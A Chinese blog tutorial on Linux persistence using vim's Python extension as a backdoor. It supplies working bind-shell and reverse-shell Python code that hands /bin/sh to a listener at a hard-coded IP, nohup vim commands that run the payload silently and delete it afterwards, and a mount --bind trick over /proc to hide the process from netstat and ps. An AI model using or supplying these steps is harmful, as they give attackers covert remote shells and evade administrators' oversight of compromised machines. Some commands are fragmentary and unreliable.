Linux权限维持之vim python 扩展后门(五)

适用于安装了vim且安装了python扩展(绝大版本默认安装)的linux系统。

复制代码
cd /usr/lib/python2.7/site-packages && $(nohup vim -E -c "pyfile dir.py">
/dev/null 2>&1 &) && sleep 2 && rm -f dir.py

$(nohup vim -E -c "py3file dir.py"> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py

恶意脚本 1.py的内容可以是任何功能的后门,比如监听本地的11端口: 正向后门

复制代码
我们可以多了解看一篇文章
https://www.leavesongs.com/PYTHON/python-shell-backdoor.html 


 
from socket import *
import subprocess
import os, threading, sys, time
if __name__ == "__main__":
    server=socket(AF_INET,SOCK_STREAM) 
    server.bind(('0.0.0.0',5555))
    server.listen(5)
    print ('waiting for connect')
    talk, addr = server.accept() 
    print ('connect from',addr)
    proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk, stdout=talk, 
                                  stderr=talk, shell=True)

我们新建目录 新建文件

反向后门

复制代码
import socket, subprocess, os;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("192.168.241.128", 6666));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
p = subprocess.call(["/bin/sh", "-i"]);

隐藏后门

复制代码
(nohup vim -E -c "py3file shell.py"> /dev/null 2>&1 &)
#将nohup的执行结果输出到/dev/null中
#其中/dev/null在linux中代表空设备,结果输出到空设备也就是丢弃nohup的执行结果。          #"2"在linux中代表错误输出,"1"在linux中代表标准输出,在此处也就是nohup的输出。2>&1表示将错误  输出绑定到标准输出上,在此处也就是将错误输出同样输出到空设备上不进行显示。这样,无论nohup执行结   果是否正确,都不会有输出。

将netstat -antp 查看到的可疑连接隐藏起来,解决方法:

既然是后门,那么就不能留下自己创建的文件,可以将删除命令直接拼接到命令上

复制代码
(nohup vim -E -c "py3file 1.py"> /dev/null 2>&1 &) && sleep 2 && rm -f 1.py

我们打开 Kail 进行监听

但是 这里能看到我们们的进程

隐藏进程

复制代码
mkdir null
mount --bind null /proc/6238
netstat -anpt

#mount--bind命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个目录的访问,并且会将前一个目录路径隐藏起来(注意这里只是隐藏不是删除,数据未发生改变,仅仅 是无法访问了)。

攻击机nc连接过去就可以了:

复制代码
nohup vim -E -c "pyfile dir.py" nc 127.0.0.1 11

查看 cat /proc/$$/mountinfo 可以看到挂在的目录
sudo umount /proc/2607 sudo netstat -anpt
ps aux | grep 2607

总体步骤

刚开始

然后我们隐藏进程

然后输入

复制代码
mkdir null
mount --bind null /proc/3362
netstat -anpt

发现已经被隐藏

然后我们

复制代码
查看 cat /proc/$$/mountinfo 可以看到挂在的目录
然后取消挂载
sudo umount /proc/3362
查看进程
sudo netstat -anpt
ps aux | grep 2607

查看挂载目录

然后我们取消挂载 发现又回来了

然后我们在挂载

mount --bind null /proc/3362

现在又看不到了

然后我们进行监听

相关推荐
苹果醋319 小时前
SpringCloud高可用集群搭建及负载均衡配置实战
java·运维·spring boot·mysql·nginx
iconball19 小时前
个人用云计算学习笔记 --15. (Linux 系统启动原理、Linux 防火墙管理))
linux·运维·笔记·学习·云计算
dragoooon3419 小时前
[Linux基础——Lesson2.Linux的基本指令使用]
linux·运维·服务器
NiKo_W19 小时前
Linux 基础IO与系统IO
linux·io·文件系统
深思慎考19 小时前
LinuxC++——spdlog日志使用入门
linux·数据库·c++
半梦半醒*19 小时前
keepalived部署
运维·服务器·nginx·架构·centos·apache
hweiyu0019 小时前
从0手写自己的Linux x86操作系统(视频教程)
linux·运维·数据库
铭哥的编程日记19 小时前
《Linux 基础 IO 完全指南:从文件描述符到缓冲区》
android·linux·运维
AORO202519 小时前
三防手机是什么?有哪些值得购入的三防手机?
网络·5g·安全·智能手机·信息与通信
猎板PCB黄浩19 小时前
PCB 半固化片:被忽视的成本控制关键,猎板的技术选型与安全适配策略
大数据·网络·人工智能